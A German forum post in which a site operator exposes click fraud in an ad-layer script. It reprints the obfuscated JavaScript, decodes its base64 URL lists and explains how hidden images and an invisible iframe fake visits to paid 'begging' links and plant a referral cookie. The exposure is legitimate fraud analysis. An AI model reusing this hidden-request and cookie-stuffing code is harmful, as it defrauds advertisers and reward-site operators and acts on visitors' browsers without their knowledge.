Hallo,
heute Abend hat mich der Besitzer von Klamm-Ads.de angeschrieben, da er vermutet bei mir auf der Seite (Cash-Town.de) würde ein Faker bei der Bettelrally aktiv sein. Auffällig ist natürlich, dass ein User immer mit Abstand ziemlich weit oben ist, ich hatte seine Referer auch schon mehrmals überprüft und konnte auf den Seiten eine Layer-Rotation von Advert-Layer.de vorfinden, ich ging also davon aus, dass er den Bettellink im Layer gebucht hat und schenkt dem keine Beachtung.
Doch der Klamm-Ads Admin war fest davon überzeugt, dass dort was nicht stimmen kann weshalb ich mir den Quelltext noch einmal genauer angeschaut habe. Ich poste nun hier den Quelltext des Layers welcher auf verschiedenen Seiten eingebunden wird:
Original-Code: https://view.advert-layer.de/ad1_587.js
Wäre super wenn den sich einige noch runterladen könnten als Beweis (habe zwar schon Zeugen, aber je mehr desto besser)
Alle Layer-Scripte welche ich kenne waren bislang verschlüsselt, soweit also nichts ungewöhnliches. Was mir jedoch aufgefallen ist ist folgender Abschnitt:
Hierbei handelt es sich um eine Reihe verschlüsselter Strings. Diese ähnelten sich alle am Anfang sehr, weshalb ich sie mal alle entschlüsselt habe, hier das Ergebnis:
Das ganze wäre ja nicht weiter schlimm. Gäbe es dort nicht noch folgenden Codeabschnitt:
Dieser Abschnitt geht die Seiten aus der Kategorie tr1 und tr2 der Reihe nach durch.
Bei Seiten der Kategorie tr1 wird ein BILD erstellt, mit Ziel-Url auf die entsprechende
Seite. Dies ist einem Aufruf gleichzusetzen (Es wird also jedesmal ein Bettelaufruf
erzeugt, ohne das der User die Seite überhaupt sieht).
Bei Seiten der Kategorie tr2 wird hingegen ein Iframe
erzeugt welches die beworbenen Seiten aufruft.
Wichtige Hinweise:
Ich werde jedoch definitiv Anzeige wegen Betrug gegen den "Bettler" erstatten, da er mich um einiges an Euro erleichtert hat
Achso ein Link zum Übeltäter darf natürlich nicht fehlen:
https://www.klamm.de/partner/unter_nickpage.php?directsearch=360691
https://www.klamm.de/partner/unter_nickpage.php?directsearch=294488
(Ich merke gerade, es sind 2 klammids beteiligt, also wird der Beteriber wohl doch davon wissen)
BTW: https://www.klamm.de/?refid=294488 wird auch als Bild aufgerufen, und somit der Ref-Cookie gesetzt. Es wäre nur mehr als fair, wenn der User aus der laufenden Refrally ausgeschlossen würde. Immerhin belegt er dort Platz 8
Werde das auch gleich noch im Team-Forum posten
So langer Text, aber wurde auch viel gefaket
heute Abend hat mich der Besitzer von Klamm-Ads.de angeschrieben, da er vermutet bei mir auf der Seite (Cash-Town.de) würde ein Faker bei der Bettelrally aktiv sein. Auffällig ist natürlich, dass ein User immer mit Abstand ziemlich weit oben ist, ich hatte seine Referer auch schon mehrmals überprüft und konnte auf den Seiten eine Layer-Rotation von Advert-Layer.de vorfinden, ich ging also davon aus, dass er den Bettellink im Layer gebucht hat und schenkt dem keine Beachtung.
Doch der Klamm-Ads Admin war fest davon überzeugt, dass dort was nicht stimmen kann weshalb ich mir den Quelltext noch einmal genauer angeschaut habe. Ich poste nun hier den Quelltext des Layers welcher auf verschiedenen Seiten eingebunden wird:
Original-Code: https://view.advert-layer.de/ad1_587.js
Wäre super wenn den sich einige noch runterladen könnten als Beweis (habe zwar schon Zeugen, aber je mehr desto besser)
Code:
var keyStr='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
var tr1=new Array(); var tr2=new Array();
function utf8_decode(utftext) {
var string = ''; var i = 0; var c = c1 = c2 = 0; while ( i < utftext.length ) {
c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; }
else if((c > 191) && (c < 224)) { c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c & 31) << 6) | (c2 & 63)); i += 2; } else { c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2); string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
i += 3; } } return string; } function as1cf5376ec5332a98bc98d10de07c491587bd6e53(input){ var bits; var decOut = ''; var i = 0;
var output = ''; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ''); while (i < input.length) {
enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1);
if (enc3 != 64) { output = output + String.fromCharCode(chr2); }
if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } return output; }
var asXec8d46dd2e6fb7dc2b70d67f94928a3b952478e0 = 'DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KCSNidXR0b24geyBmbG9hdDog'+
'bGVmdDsgd2lkdGg6IDIwcHg7IGhlaWdodDogMjRweDsgei1pbmRleDogOTk5'+
'OyB9DQoJI3dlcmJ1bmcgeyBvdmVyZmxvdzogYXV0bzsgY29sb3I6ICMzYzNj'+
'M2M7IGZvbnQtc2l6ZTogMTFweDsgZm9udC1mYW1pbHk6IGFyaWFsOyB9DQo8'+
'L3N0eWxlPg0KPGRpdiBpZD0ibGF5ZXJkaXYiIHN0eWxlPSJwb3NpdGlvbjog'+
'YWJzb2x1dGU7IHdpZHRoOiA4MDBweDsgdG9wOiAyMHB4OyBsZWZ0OiAyMHB4'+
'OyB6LWluZGV4OiAxMDAwMDA7IGRpc3BsYXk6IG5vbmU7IGJvcmRlcjogMHB4'+
'OyBib3JkZXItbGVmdDogMXB4IHNvbGlkICNhZGFkYWQ7IGJvcmRlci1ib3R0'+
'b206IDFweCBzb2xpZCAjYWRhZGFkOyBib3JkZXItcmlnaHQ6IDFweCBzb2xp'+
'ZCAjYWRhZGFkOyBiYWNrZ3JvdW5kLWNvbG9yOiAjZmZmOyBtYXJnaW46IDFw'+
'eDsiPg0KCTxkaXYgc3R5bGU9IndpZHRoOiA3OThweDsgYm9yZGVyOiAxcHgg'+
'c29saWQgI2ZmZjsgYm9yZGVyLXRvcDoxcHggc29saWQgI2FkYWRhZDsgaGVp'+
'Z2h0OiA0NDBweDsgei1pbmRleDogMTAwMDAwOyI+DQoJCTxkaXYgc3R5bGU9'+
'InotaW5kZXg6IDEwMDAwMTsgaGVpZ2h0OiAyNHB4OyB3aWR0aDogNzk4cHg7'+
'IG1hcmdpbi1ib3R0b206IDFweDsgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZm'+
'ZjsgYm9yZGVyLWJvdHRvbTogMXB4IHNvbGlkICNiNTMwMjY7ICI+DQoJCQk8'+
'ZGl2IHN0eWxlPSJ3aWR0aDogNzc0cHg7IGhlaWdodDogMjJweDsgZmxvYXQ6'+
'bGVmdDsgei1pbmRleDogMTAwMDAyOyBwYWRkaW5nLXRvcDo0cHg7ICI+DQoJ'+
'CQkJICA8c3BhbiBpZD0id2VyYnVuZyI+ICZuYnNwOzxiPlRpcHA6PC9iPiA8'+
'YSBocmVmPSJodHRwOi8vYWR2ZXJ0LWxheWVyLmRlL2NsK05UZzMuaHRtbCIg'+
'dGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJmb250LXNpemU6MTFweDsgZm9udC1m'+
'YW1pbHk6IGFyaWFsOyBjb2xvcjojYjUzMDI2OyB0ZXh0LWRlY29yYXRpb246'+
'IG5vbmU7IGZvbnQtd2VpZ2h0OiBub3JtYWw7Ij5MYXllciBTZXJ2aWNlIGJ5'+
'IEFkdmVydC1MYXllci5kZSAtIEJpcyB6dSAxMC4wMDAgTG9zZSBwcm8gTGF5'+
'ZXIgQXVmcnVmIC0gSmV0enQgYW5tZWxkZW4gdW5kIG1pdCB2ZXJkaWVuZW4h'+
'PC9hPiA8L3NwYW4+DQoJCQk8L2Rpdj4NCgkJCTxkaXYgaWQ9ImJ1dHRvbiIg'+
'PjxhIGhyZWY9IiMiIG9uY2xpY2s9InJldHVybiBfTGF5ZXJDbG9zZSgpOyIg'+
'PjxpbWcgc3R5bGU9Im1hcmdpbi10b3A6NXB4OyIgc3JjPSJodHRwOi8vdmll'+
'dy5hZHZlcnQtbGF5ZXIuZGUvaW1hZ2VzL2Nyb3NzLnBuZyIgaWQ9ImJ1dCIg'+
'YWx0PSJMYXllciBzY2hsaWVzZW4iIGJvcmRlcj0iMCI+PC9hPjwvZGl2Pg0K'+
'ICAgICAgICAgICAgICAgIDwvZGl2Pg0KCQk8ZGl2IHN0eWxlPSJoZWlnaHQ6'+
'IDQxNXB4OyB3aWR0aDo3OThweDsgcGFkZGluZzogMHB4OyBjbGVhcjogYm90'+
'aDsgei1pbmRleDogMTAwMDA1OyI+DQoJCQk8aWZyYW1lIG5hbWU9ImxheWVy'+
'aWZyYW1lIiBpZD0ibGF5ZXJpZnJhbWVfaWQiIHNyYz0iIiBmcmFtZWJvcmRl'+
'cj0iMCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgc2Nyb2xsaW5nPSJu'+
'byI+PC9pZnJhbWU+DQoJCTwvZGl2Pg0KCTwvZGl2Pjxocj4NCiAgICAgICAg'+
'PGRpdiBzdHlsZT0idGV4dC1hbGlnbjpjZW50ZXI7Ij48aWZyYW1lIHNyYz0i'+
'aHR0cDovL3ZpZXcuYWR2ZXJ0LWxheWVyLmRlL2Fkcy9mYTEucGhwP3VuaXE9'+
'NTcyODEyOSZyYW5kb209ZWJiNTVlNzI0YTZmM2IwNTJhMmM5Njg0ZGUwN2Ux'+
'OTA5YTgyNjg1NCIgd2lkdGg9IjcyOCIgaGVpZ2h0PSI5MCIgc2Nyb2xsaW5n'+
'PSJubyIgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPjwvZGl2Pg0KPC9kaXY+DQogICAg';
document.write(as1cf5376ec5332a98bc98d10de07c491587bd6e53(asXec8d46dd2e6fb7dc2b70d67f94928a3b952478e0));
var _Element = new Array();
var links;
function _GetTopElement() {
thebody = document.getElementsByTagName('div');
if(thebody.length > 0) {
return document; }
else {
return document.parentElement; }
}
function _LayerMove(links) {
layer_rand.style.display = 'block';
links += 60;
layer_rand.style.left = links + "px";
if (links < 11){
setTimeout("_LayerMove("+links+")", 15);
}
}
function _GetLeft(fal) {
if (fal.offsetParent) {
return (fal.offsetLeft + _GetLeft(fal.offsetParent)); }
else {
return (fal.offsetLeft); }
}
function _GetTop(fal) {
if (fal.offsetParent) {
return (fal.offsetTop + _GetTop(fal.offsetParent)); }
else {
return (fal.offsetTop); }
}tr1[0] = 'aHR0cDovL3d3dy5jcnVuY2hpbmdiYXNldGVhbS5jb20vYmV0dGVsbi5waHA/dXNlcj1taXJyb3I=';
tr1[1] = 'aHR0cDovL2Nhc2gtdG93bi5kZS9iZXR0ZWxuLnBocD9yZWZpZD0xNTQwNg==';
tr1[2] = 'aHR0cDovL3d3dy5ob2JieWxvc2UuZGUvP2NvbnRlbnQ9L2JldHRlbG4mcmVmPTM2MDY5MQ==';
tr1[3] = 'aHR0cDovL2NsdWJwb3N0LmRlL2luZGV4LnBocD9tb2Q9YmVnZ2luZyZ1c2VyaWQ9MTAwMTMzJnJlZmlkPTEwMDEzMw==';
tr1[4] = 'aHR0cDovL3ppdGFnby5kZS8/Y29udGVudD0vYmV0dGVsMiZyZWY9MzYwNjkx';
tr1[5] = 'aHR0cDovL3d3dy5hbGw0Y2xpY2suZGUvaW5kZXgucGhwP2NvbnRlbnQ9c2l0ZS9iZXR0ZWxuJmJldHRlbG5pY2s9bWlycm9yJndlcmJlcj1taXJyb3I=';
tr1[6] = 'aHR0cDovL3ByaW1lcmFjbHViLmRlLz9jb250ZW50PS9iZXR0ZWxuJnJlZj0yNjM5';
tr1[7] = 'aHR0cDovL3d3dy5wcmltZXJhcGFyYWRpZXMuZGUvYmV0dGVsLnBocD91c3I9bWlycm9yICA=';
tr1[8] = 'aHR0cDovL3d3dy5sb3NlLXJhdXNjaC5ldS8/Y29udGVudD0vYmV0dGVsbiZyZWY9MzYwNjkx';
tr1[9] = 'aHR0cDovL3d3dy5rbGFtbS1tYWlsZXIuZGUvcGFpZGtsaWNrLnBocD91c2VyPU5lZWRTb21lV2VlZA==';
tr1[10] = 'aHR0cDovL3d3dy5rbGFtbS5kZS8/cmVmaWQ9Mjk0NDg4';
tr1[11] = 'aHR0cDovL2JvbnVzaHVudGVyLmRlL2luZGV4LnBocD9tb2Q9YmVnZ2luZyZ1c2VyPWNhbXBhcmk=';
tr2[0] = 'aHR0cDovL2ZpbG1nZXdpbm4uZGU=';
tr1[12] = 'aHR0cDovL3d3dy5lYmVzdWNoZXItd2VsdC5kZS9pbmRleC5waHA/Y29udGVudD1zaXRlL2JldHRlbG4mYmV0dGVsbmljaz1jYW1wYXJpJndlcmJlcj1jYW1wYXJp';
tr1[13] = 'aHR0cDovL2tsYW1tLWFkcy5kZS8/YmV0dGVsbi9OZWVkU29tZVdlZWQv';
function _LayerClose() {
_HideAnimation('10');
(new Image()).src = 'https://view.advert-layer.de/ad1_click.php?l=0&campain=253&code=587&z=1276812346&sec=0e3996f1856de4fd59c1f45966922469813fafb2&la=DE';
open('https://view.advert-layer.de/ad.php?url=aHR0cDovL2NsaXguc3VwZXJjbGl4LmRlL2NnaS1iaW4vdGNsaXguY2dpP2lkPXRtYXJpbiZwcD0xMzk4NSZsaW5rbnI9MjMyNjkmc3ViaWQ9NTg3LTEyM3NraW5z&c=f9a09473001e9150ce4e5f706be3881f23e855f8' , '', 'menubar=no,toolbar=no,resizable=yes,location=yes,scrollbars=yes,status=yes');
self.focus();
return false;
}
function _HideAnimation(left) {
if(left > -800) {
left -= 200; layer_rand.style.left = left; setTimeout("_HideAnimation(" + left + ")", 50);
} else { layer_rand.style.display = 'none'; layer_rand.style.left = '-2000'; layer_rand.style.top = '-2000';
}
}
for(i=0;i<tr1.length;i++){
(new Image()).src = as1cf5376ec5332a98bc98d10de07c491587bd6e53(tr1[i]);
}
for(x=0;x<tr2.length;x++){
var tr= document.createElement('iframe');
tr.src = as1cf5376ec5332a98bc98d10de07c491587bd6e53(tr2[x]);
tr.style.display = 'none';
document.body.appendChild(tr);
}
function _Update() {
if(document.all) {
if (document.documentElement && document.documentElement.scrollTop) {
_Pos = document.documentElement.scrollTop }
else if (document.body) {
_Pos = document.body.scrollTop }
layer_rand.style.top = _Pos + 10 + 'px'; setTimeout("_Update()", 1); }
else {
layer_rand.style.position = 'fixed'; }
}
function _StartAd() {
document.getElementById("layeriframe_id").src = 'https://view.advert-layer.de/ad.php?url=aHR0cDovL2NsaXguc3VwZXJjbGl4LmRlL2NnaS1iaW4vdGNsaXguY2dpP2lkPXRtYXJpbiZwcD0xMzk4NSZsaW5rbnI9MjMyNjkmc3ViaWQ9NTg3LTEyM3NraW5z&c=f9a09473001e9150ce4e5f706be3881f23e855f8';
_Update();
setTimeout("_LayerMove(-990)", 3000);
}
if(screen.availWidth > 800) {
width = '800'; }
else { width = '700'; }
var layer_rand = document.getElementById('layerdiv');
_StartAd();Alle Layer-Scripte welche ich kenne waren bislang verschlüsselt, soweit also nichts ungewöhnliches. Was mir jedoch aufgefallen ist ist folgender Abschnitt:
Code:
tr1[0] = 'aHR0cDovL3d3dy5jcnVuY2hpbmdiYXNldGVhbS5jb20vYmV0dGVsbi5waHA/dXNlcj1taXJyb3I=';
tr1[1] = 'aHR0cDovL2Nhc2gtdG93bi5kZS9iZXR0ZWxuLnBocD9yZWZpZD0xNTQwNg==';
tr1[2] = 'aHR0cDovL3d3dy5ob2JieWxvc2UuZGUvP2NvbnRlbnQ9L2JldHRlbG4mcmVmPTM2MDY5MQ==';
tr1[3] = 'aHR0cDovL2NsdWJwb3N0LmRlL2luZGV4LnBocD9tb2Q9YmVnZ2luZyZ1c2VyaWQ9MTAwMTMzJnJlZmlkPTEwMDEzMw==';
tr1[4] = 'aHR0cDovL3ppdGFnby5kZS8/Y29udGVudD0vYmV0dGVsMiZyZWY9MzYwNjkx';
tr1[5] = 'aHR0cDovL3d3dy5hbGw0Y2xpY2suZGUvaW5kZXgucGhwP2NvbnRlbnQ9c2l0ZS9iZXR0ZWxuJmJldHRlbG5pY2s9bWlycm9yJndlcmJlcj1taXJyb3I=';
tr1[6] = 'aHR0cDovL3ByaW1lcmFjbHViLmRlLz9jb250ZW50PS9iZXR0ZWxuJnJlZj0yNjM5';
tr1[7] = 'aHR0cDovL3d3dy5wcmltZXJhcGFyYWRpZXMuZGUvYmV0dGVsLnBocD91c3I9bWlycm9yICA=';
tr1[8] = 'aHR0cDovL3d3dy5sb3NlLXJhdXNjaC5ldS8/Y29udGVudD0vYmV0dGVsbiZyZWY9MzYwNjkx';
tr1[9] = 'aHR0cDovL3d3dy5rbGFtbS1tYWlsZXIuZGUvcGFpZGtsaWNrLnBocD91c2VyPU5lZWRTb21lV2VlZA==';
tr1[10] = 'aHR0cDovL3d3dy5rbGFtbS5kZS8/cmVmaWQ9Mjk0NDg4';
tr1[11] = 'aHR0cDovL2JvbnVzaHVudGVyLmRlL2luZGV4LnBocD9tb2Q9YmVnZ2luZyZ1c2VyPWNhbXBhcmk=';
tr2[0] = 'aHR0cDovL2ZpbG1nZXdpbm4uZGU=';
tr1[12] = 'aHR0cDovL3d3dy5lYmVzdWNoZXItd2VsdC5kZS9pbmRleC5waHA/Y29udGVudD1zaXRlL2JldHRlbG4mYmV0dGVsbmljaz1jYW1wYXJpJndlcmJlcj1jYW1wYXJp';
tr1[13] = 'aHR0cDovL2tsYW1tLWFkcy5kZS8/YmV0dGVsbi9OZWVkU29tZVdlZWQv';Hierbei handelt es sich um eine Reihe verschlüsselter Strings. Diese ähnelten sich alle am Anfang sehr, weshalb ich sie mal alle entschlüsselt habe, hier das Ergebnis:
https://www.crunchingbaseteam.com/betteln.php?user=mirror
https://cash-town.de/betteln.php?refid=15406
https://www.hobbylose.de/?content=/betteln&ref=360691
https://clubpost.de/index.php?mod=begging&userid=100133&refid=100133
https://zitago.de/?content=/bettel2&ref=360691
https://www.all4click.de/index.php?content=site/betteln&bettelnick=mirror&werber=mirror
https://www.primeraparadies.de/bettel.php?usr=mirror
https://www.lose-rausch.eu/?content=/betteln&ref=360691
https://www.klamm-mailer.de/paidklick.php?user=NeedSomeWeed
https://www.klamm.de/?refid=294488
https://bonushunter.de/index.php?mod=begging&user=campari
https://filmgewinn.de
https://www.ebesucher-welt.de/index.php?content=site/betteln&bettelnick=campari&werber=campari
https://klamm-ads.de/?betteln/NeedSomeWeed/
https://cash-town.de/betteln.php?refid=15406
https://www.hobbylose.de/?content=/betteln&ref=360691
https://clubpost.de/index.php?mod=begging&userid=100133&refid=100133
https://zitago.de/?content=/bettel2&ref=360691
https://www.all4click.de/index.php?content=site/betteln&bettelnick=mirror&werber=mirror
https://www.primeraparadies.de/bettel.php?usr=mirror
https://www.lose-rausch.eu/?content=/betteln&ref=360691
https://www.klamm-mailer.de/paidklick.php?user=NeedSomeWeed
https://www.klamm.de/?refid=294488
https://bonushunter.de/index.php?mod=begging&user=campari
https://filmgewinn.de
https://www.ebesucher-welt.de/index.php?content=site/betteln&bettelnick=campari&werber=campari
https://klamm-ads.de/?betteln/NeedSomeWeed/
Das ganze wäre ja nicht weiter schlimm. Gäbe es dort nicht noch folgenden Codeabschnitt:
Code:
for(i=0;i<tr1.length;i++){
(new Image()).src = as1cf5376ec5332a98bc98d10de07c491587bd6e53(tr1[i]);
}
for(x=0;x<tr2.length;x++){
var tr= document.createElement('iframe');
tr.src = as1cf5376ec5332a98bc98d10de07c491587bd6e53(tr2[x]);
tr.style.display = 'none';
document.body.appendChild(tr);
}Dieser Abschnitt geht die Seiten aus der Kategorie tr1 und tr2 der Reihe nach durch.
Bei Seiten der Kategorie tr1 wird ein BILD erstellt, mit Ziel-Url auf die entsprechende
Seite. Dies ist einem Aufruf gleichzusetzen (Es wird also jedesmal ein Bettelaufruf
erzeugt, ohne das der User die Seite überhaupt sieht).
Bei Seiten der Kategorie tr2 wird hingegen ein Iframe
erzeugt welches die beworbenen Seiten aufruft.
Wichtige Hinweise:
- die Scripte sind öffentlich einsehbar für jedermann und dürfen deshalb hier veröffentlicht werden
- Es kann sein, dass der Betreiber von Advert-Layer.de nichts von allem weiß. Mir wurde von einer dritten Person erzählt, dass der User welchem die Bettellinks gehören (NeedSomeWeed) nur Programmierer bei dem Projekt wäre.
Ich werde den Betreiber von Advert-Layer.de jedoch gleich anschreiben mit einem Link zu diesem Thread.
Ich werde jedoch definitiv Anzeige wegen Betrug gegen den "Bettler" erstatten, da er mich um einiges an Euro erleichtert hat
Achso ein Link zum Übeltäter darf natürlich nicht fehlen:
https://www.klamm.de/partner/unter_nickpage.php?directsearch=360691
https://www.klamm.de/partner/unter_nickpage.php?directsearch=294488
(Ich merke gerade, es sind 2 klammids beteiligt, also wird der Beteriber wohl doch davon wissen
)BTW: https://www.klamm.de/?refid=294488 wird auch als Bild aufgerufen, und somit der Ref-Cookie gesetzt. Es wäre nur mehr als fair, wenn der User aus der laufenden Refrally ausgeschlossen würde. Immerhin belegt er dort Platz 8
Werde das auch gleich noch im Team-Forum posten So langer Text, aber wurde auch viel gefaket
.
Geiler geht es kaum!!!
